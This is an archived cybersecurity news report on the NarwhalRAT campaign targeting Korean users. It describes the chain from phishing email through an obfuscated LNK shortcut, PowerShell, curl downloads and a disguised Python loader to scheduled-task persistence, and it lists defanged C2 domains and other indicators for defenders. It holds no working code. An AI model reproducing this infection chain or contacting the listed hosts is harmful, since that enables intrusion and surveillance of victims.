CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 15, 2026

Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT

Cybersecurity News Archived Jun 15, 2026 ✓ Full text saved

A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making […] The post Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT appeared first on Cyber Security Ne

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeCyber Security News Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT By Tushar Subhra Dutta June 15, 2026 A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch. The infection begins with a spear phishing email pretending to be an urgent security alert from the “Microsoft Account Team.” The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document. Analysts at Genians Security Center said in a report shared with Cyber Security News (CSN) that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026. Researchers named the malware NarwhalRAT, drawing on the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea. The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns Hidden and System file attributes to the created folder to stay out of plain sight. It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting. The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder. NarwhalRAT Loader Attack When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment variable substring substitution to hide the real commands, dynamically rebuilding strings like “powershell” and “curl.exe” at runtime to evade static detection. After deobfuscation, the LNK file launches PowerShell with execution policy bypassed and uses a copied curl.exe to download two files from the relay server. The first is a decoy HWP document opened to keep the victim unsuspecting, while the second is a batch script named KHjWFcuS.bat that performs next-stage installation in a hidden window. This technique of abusing built-in tools is classified as Living-off-the-Land. The batch file downloads the official Python embedded package to make the activity look like a normal software installation. It renames Pythonw.exe to usersscreen.exe to suppress any console window. The final payload, config.cat, is disguised with a .cat extension to resemble a Windows security catalog, though it is actually compiled Python bytecode acting as a backdoor loader. Decrypted Batch File Commands (Source – Genians) For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” running at one-minute intervals. This name mimics a legitimate Microsoft task, making it hard for administrators to spot during inspection. A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload. NarwhalRAT Capabilities and C2 Communication Once the payload executes in memory through fileless execution, NarwhalRAT reveals itself as a fully featured Remote Access Trojan. It first checks for virtual machine environments including VMware, VirtualBox, and Parallels Desktop to avoid sandbox analysis, a tactic typical of APT-level malware. The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes. Keystroke data is temporarily stored before being transmitted in batches, reducing real-time detection chances. Prefix-Based Command Control System (Source – Genians) From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse based on LNK and PowerShell. Security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window. Indicators of Compromise (IoCs):- Type Indicator Description Domain daehoat[.]com Primary C2 Korean relay server Domain novel21[.]co[.]kr Primary C2 Korean relay server Domain fe01[.]co[.]kr Initial ZIP file download relay Domain webhostingkorea[.]com Secondary relay used in LNK and BAT download stages File Name Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).lnk Malicious LNK file inside the phishing ZIP File Name Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).zip Phishing ZIP archive attachment File Name KHjWFcuS.bat Second-stage batch file delivering the Python loader File Name config.cat Python bytecode backdoor loader disguised as Windows catalog file File Name AccountConfig.cat Subsequent large Python payload with obfuscated RAT code File Name usersscreen.exe Renamed Pythonw.exe used to silently execute the payload Scheduled Task MicrosoftUserInterfacePicturesUpdateTackMachine Persistence scheduled task running at one-minute intervals File Path C:\Users\Public\AccountPictures\UserInerfacePicture\ Directory where payload files are deployed File Path C:\ProgramData\GoogleDriveUpdateCheck\ Directory where AccountConfig.cat is stored Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News OWASP Releases AI Security Report to Empower Security Professionals with New Tools Hackers Use OnyxC2 Malware-as-a-Service to Steal Credentials From 210 Applications Slow Triage Is Raising Business Risk. Here’s How SOC Teams Cut Investigation Time  Threat Actors Abuse ChatGPT, Claude, and DeepSeek Brands as Phishing Lures to Steal Credentials China-Linked JDY Botnet Uses 1,500+ SOHO and IoT Devices for Rapid Vulnerability Exploitation Latest News Cyber Security News Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence Cyber Security SecSuite – AI-powered Tool for OSINT, Web and API Security Testing Cyber Security News WinRAR Vulnerability Exploited by Russian Hackers to Deploy GIFTEDCROOK Stealer Cyber Security News Palo Alto Warns of GlobalProtect VPN Vulnerability Actively Exploited in the Wild Cyber Security News Threat Actor Malware Platform Exposed via Unlocked PHP Installation Page
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 15, 2026
    Archived
    Jun 15, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗